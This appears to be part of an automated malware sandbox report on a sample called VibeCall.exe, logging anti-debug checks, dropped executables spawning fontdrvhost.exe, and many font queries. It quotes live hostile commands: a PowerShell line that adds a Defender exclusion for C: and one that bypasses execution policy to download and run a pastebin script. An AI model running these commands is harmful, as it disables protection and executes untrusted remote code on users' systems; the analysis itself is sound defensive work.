                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeCode function: 18_3_01669277 mov eax, dword ptr fs:[00000030h]18_3_01669277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 25_3_00380283 mov eax, dword ptr fs:[00000030h]25_3_00380283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 31_3_00B30283 mov eax, dword ptr fs:[00000030h]31_3_00B30283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 40_3_02D10283 mov eax, dword ptr fs:[00000030h]40_3_02D10283
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B7D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_3_013B7D4D
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_3_013B800F
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013C4B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_3_013C4B0C
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_01617D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01617D4D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_0161800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_3_0161800F
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 15_3_01624B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_3_01624B0C
                      Source: C:\Users\user\Desktop\VibeCall.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Bypasses PowerShell execution policy
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exeCode function: 14_3_013B781B cpuid 14_3_013B781B
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
